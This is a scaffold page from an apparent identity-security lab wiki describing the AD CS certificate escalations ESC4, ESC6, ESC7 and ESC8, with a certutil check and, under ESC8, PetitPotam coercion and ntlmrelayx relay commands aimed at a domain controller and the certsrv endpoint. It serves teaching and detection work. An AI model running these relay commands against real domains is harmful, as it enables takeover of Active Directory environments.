ESC4–ESC8 — CA-Level and ACL Attacks

Status: Scaffold — content in progress

ATT&CK: T1649
Severity: Critical

ESC4 — Vulnerable Template ACL

An attacker with WriteDACL, WriteOwner, or GenericWrite on a certificate template can modify the template to become vulnerable to ESC1 (add SAN flag, add Client Auth EKU), then enroll.

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 CA Flag

If the CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, any template allows SAN in requests — equivalent to ESC1 for all templates.

certutil -config "CA\ITDR-CA" -getreg policy\EditFlags
# If EDITF_ATTRIBUTESUBJECTALTNAME2 is set → ESC6

ESC7 — Vulnerable CA ACL

If a low-privilege user has ManageCA or ManageCertificates on the CA:

ManageCertificates → approve pending certificate requests
ManageCA → change CA flags (e.g., add ESC6 flag)

ESC8 — NTLM Relay to ADCS HTTP Endpoint

AD CS Web Enrollment (certsrv) accepts NTLM authentication over HTTP by default. An attacker in a man-in-the-middle position can relay NTLM credentials (e.g., from a machine account via coercion) to the certsrv endpoint and obtain a certificate for the relayed account (e.g., Domain Controller machine account → DCSync rights).

# Coerce DC to authenticate to attacker
PetitPotam.py -d itdr.lab -u user -p pass attacker_ip dc01_ip

# Relay to certsrv (on separate terminal)
ntlmrelayx.py -t http://ca.itdr.lab/certsrv/certfnsh.asp --adcs --template DomainController

Cross-Links

Topic	Link
ADCS Protocol	adcs
ESC1	esc1-template-abuse
Detection	detect-certificate-attacks

ESC4 — Vulnerable Template ACL​

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 CA Flag​

ESC7 — Vulnerable CA ACL​

ESC8 — NTLM Relay to ADCS HTTP Endpoint​

Cross-Links​

ESC4 — Vulnerable Template ACL

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 CA Flag

ESC7 — Vulnerable CA ACL

ESC8 — NTLM Relay to ADCS HTTP Endpoint

Cross-Links